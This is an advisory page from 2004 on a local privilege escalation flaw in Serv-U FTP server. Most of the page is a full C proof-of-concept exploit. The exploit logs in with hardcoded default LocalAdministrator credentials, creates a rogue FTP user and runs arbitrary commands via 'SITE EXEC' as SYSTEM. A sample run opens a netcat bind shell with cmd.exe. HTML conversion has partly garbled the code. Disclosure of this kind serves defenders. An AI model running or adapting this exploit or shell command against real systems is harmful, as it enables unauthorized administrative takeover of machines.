Local Privilege Escalation Vulnerability in ServU FTP server
A vulnerability in Rhino Software's Serv-U FTP server 4.x through 5.1.0.0 lets a local unprivileged user execute commands with SYSTEM privileges.
August 16, 2004
Reported August 15, 2004, by aT4rins4n3.
VERSIONS AFFECTED
DESCRIPTION
A vulnerability in Rhino Software's Serv-U FTP server 4.x through 5.1.0.0 lets alocal unprivileged user execute commands with SYSTEM privileges because of aproblem with Serv-U administration. This vulnerability stems from the fact that Serv-U FTP server in all its platforms has a local administration account that can be used to configure the server. This account has a default login and password credentials and is only available through the loop back interface. An unprivileged user can connect to the server with the default login information and use the "SITE EXEC" command to execute arbitrary commands. The commands are run with SYSTEM privileges in effect turning Serv-U into a conduit through which administrative commands can be run.
DEMONSTRATION
The discoverer posted the following code as proof of concept:
<p><span style="font-size: 10.0pt;font-family: Courier;">/*<br> * Hax0rcitos proudly presents<br> * Serv-u Local Exploit >v3.x. (tested also against last version5.1.0.0)<br> *<br> * All Serv-u Versions have default Login/password for localAdministration.<br> * This account is only available to connect in the loopback interface, soa<br> * local user will be able to connect to Serv-u with this account andcreate<br> * an ftp user with execute rights. after the user is created, justconnect<br> * to the ftp server and execute a raw "SITE EXEC" command. theprogram will<br> * be execute with SYSTEM privileges.<br> *<br> * Copyright (c) 2003-2004 Haxorcitos.com . All Rights Reserved.<br> *<br> * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "ASIS"<br> * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION<br> * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.<br> *<br> *<br> * Date: 10/2003<br> * Author: Andr s Tarasc Acunha<br> *<br> * Greetings to: #haxorcitos - #localhost and #!dsr blackxors =)<br> *<br> * Tested Against Serv-u 4.x and v5.1.0.0<br><br> G:exploitserv-Ulocal>whoami<br> INSANEaT4r<br><br> G:exploitserv-Ulocal>servulocal.exe "nc -l-p 99 -e cmd.exe"<br> Serv-u >3.x Local Exploit by Haxorcitos<br><br> <220 Serv-U FTP Server v5.0 for WinSock ready...<br> >USER LocalAdministrator<br> <331 User name okay, need password.<br> ******************************************************<br> >PASS #l@$ak#.lk;0@P<br> <230 User logged in, proceed.<br> ******************************************************<br> >SITE MAINTENANCE<br> ******************************************************<br> [+] Creating New Domain...<br> <200-DomainID=3<br> 220 Domain settings saved<br> ******************************************************<br> [+] Domain Haxorcitos:3 Created<br> [+] Setting New Domain Online<br> <220 Server command OK<br> ******************************************************<br> [+] Creating Evil User<br> <200-User=haxorcitos<br> 200 User settings saved<br> ******************************************************<br> [+] Now Exploiting...<br> >USER haxorcitos<br> <331 User name okay, need password.<br> ******************************************************<br> >PASS whitex0r<br> <230 User logged in, proceed.<br> ******************************************************<br> [+] Now Executing: nc -l -p 99 -e cmd.exe<br> <220 Domain deleted<br> ******************************************************<br> G:exploitserv-Ulocal>nc localhost 99<br> Microsoft Windows XP [Versi n 5.1.2600]<br> (C) Copyright 1985-2001 Microsoft Corp.<br><br> C:>whoami<br> whoami<br> NT AUTHORITYSYSTEM<br> C:><br> */<br><br>#include<stdio.h><br>#include<stdlib.h><br>#include<winsock2.h><br>#include<io.h><br>#include<process.h><br><br>//Responses<br>#define BANNER "220 "<br>#define USEROK "331 User name okay"<br>#define PASSOK "230 User logged in, proceed."<br>#define ADMOK "230-Switching to SYSTEM MAINTENANCE mode."<br>#define DOMAINID "200-DomainID="<br>//Commands<br><br>#define XPLUSER "USER haxorcitosr"<br>#define XPLPASSWORD "PASS whitex0rr"<br>#define USER "USER LocalAdministratorr"<br>#define PASSWORD "PASS #l@$ak#.lk;0@Pr"<br><br>#define MAINTENANCE "SITE MAINTENANCEr"<br>#define EXIT "QUITr"<br>char newdomain[]="-SETDOMAINr"<br> "-Domain=haxorcitos|0.0.0.0|2121|-1|1|0r"<br> "-TZOEnable=0r"<br> " TZOKey=r";<br>/* "-DynDNSEnable=0r"<br> "DynIPName=r";<br>*/<br>char deldomain[]="-DELETEDOMAINr"<br> "-IP=0.0.0.0r"<br> "PortNo=2121r";<br><br>char newuser[] =<br> "-SETUSERSETUPr"<br> "-IP=0.0.0.0r"<br> "-PortNo=2121r"<br> "-User=haxorcitosr"<br> "-Password=whitex0rr"<br> "-HomeDir=c:\r"<br> "-LoginMesFile=r"<br> "-Disable=0r"<br> "-RelPaths=1r"<br> "-NeedSecure=0r"<br> "-HideHidden=0r"<br> "-AlwaysAllowLogin=0r"<br> "-ChangePassword=0r"<br> "-QuotaEnable=0r"<br> "-MaxUsersLoginPerIP=-1r"<br> "-SpeedLimitUp=0r"<br> "-SpeedLimitDown=0r"<br> "-MaxNrUsers=-1r"<br> "-IdleTimeOut=600r"<br> "-SessionTimeOut=-1r"<br> "-Expire=0r"<br> "-RatioUp=1r"<br> "-RatioDown=1r"<br> "-RatiosCredit=0r"<br> "-QuotaCurrent=0r"<br> "-QuotaMaximum=0r"<br> "-Maintenance=Noner"<br> "-PasswordType=Regularr"<br> "-Ratios=Noner"<br> "Access=c:\|RELPr";<br><br>#define localport 43958<br>#define localip "127.0.0.1"<br><br>char cadena[1024];<br>int rec,domain;<br>/******************************************************************************/<br><br>void ParseCommands(int sock, char *data, int ShowSend, int showResponses,<br>char *response) {<br> send(sock,data,strlen(data),0);<br> if (ShowSend) printf(">%s",data);<br> Sleep(100);<br> do {<br> rec=recv(sock,cadena,sizeof(cadena),0);cadena[rec]='';<br> if (rec<=0) return;<br> if (showResponses)printf("<%s",cadena);<br> if (strncmp(cadena,DOMAINID,strlen(DOMAINID))</process.h></io.h></winsock2.h></stdlib.h></stdio.h></span></p><h2><a name="0_br_#160_#160_#160_#160_#160_#160_#160_#160_domain_atoi_cadena_strlen_DOMAINID_br_#160_while_strncmp_cadena_response_strlen_response_0_br_#160_while_strstr_cadena_response_" id="0_br_#160_#160_#160_#160_#160_#160_#160_#160_domain_atoi_cadena_strlen_DOMAINID_br_#160_while_strncmp_cadena_response_strlen_response_0_br_#160_while_strstr_cadena_response_">0)<br> domain=atoi(cadena+strlen(DOMAINID));<br> //} while (strncmp(cadena,response,strlen(response))!=0);<br> } while (strstr(cadena,response)</a></h2>NULL);
printf("******************************************************r");
}
/******************************************************************************/
int main(int argc, char* argv[])
{
WSADATA ws;
int sock,sock2;
struct sockaddr_in haxorcitos;
struct sockaddr_in xpl;
printf("Serv-u >3.x Local Exploit by Haxorcitosrr");
if (argc<2) {
printf("USAGE: ServuLocal.exe"command"r");
printf("Example: ServuLocal.exe "nc.exe -l-p 99 -e cmd.exe"");
return(0);
}
if (WSAStartup( MAKEWORD(2,2), &ws )!=0) {
printf(" [-] WSAStartup()error");
exit(0);
}
haxorcitos.sin_family = AF_INET;
haxorcitos.sin_port = htons(localport);
haxorcitos.sin_addr.s_addr = inet_addr(localip);
sock=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
connect(sock,( struct sockaddr*)&haxorcitos,sizeof(haxorcitos));
rec=recv(sock,cadena,sizeof(cadena),0);cadena[rec]='';
printf("<%s",cadena);
ParseCommands(sock,USER,1,1,USEROK);
ParseCommands(sock,PASSWORD,1,1,PASSOK);
ParseCommands(sock,MAINTENANCE,1,0,"230 ");
printf("[+] Creating New Domain...r");
ParseCommands(sock,newdomain,0,1,BANNER);
printf("[+] Domain Haxorcitos:%iCreated",domain);
/* Only for v5.x
printf("[+] Setting New Domain Onliner");
sprintf(cadena,"-SERVERCOMMANDr-ID=%ir
Command=DomainOnliner",domain);
ParseCommands(sock,cadena,0,1,BANNER);
*/
printf("[+] Creating Evil Userr");
ParseCommands(sock,newuser,0,1,"200 ");
Sleep(1000);
printf("[+] Now Exploiting...r");
xpl.sin_family = AF_INET;
xpl.sin_port = htons(2121);
xpl.sin_addr.s_addr = inet_addr(localip);
sock2=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
connect(sock2,( struct sockaddr*)&xpl,sizeof(xpl));
rec=recv(sock2,cadena,sizeof(cadena),0);cadena[rec]='';
ParseCommands(sock2,XPLUSER,1,1,USEROK);
ParseCommands(sock2,XPLPASSWORD,1,1,PASSOK);
printf("[+] Now Executing: %sr",argv[1]);
sprintf(cadena,"site exec %sr",argv[1]);
send(sock2,cadena,strlen(cadena),0);
shutdown(sock2,SD_BOTH);
Sleep(100);
ParseCommands(sock,deldomain,0,1,BANNER);
send(sock,EXIT,strlen(EXIT),0);
shutdown(sock,SD_BOTH);
closesocket(sock);
closesocket(sock2);
return 0;
}
VENDOR RESPONSE
Rhino Software has beennotified but hasn't released a fix for this problem.
CREDIT
Discovered by aT4r ins4n3.
About the Author
You May Also Like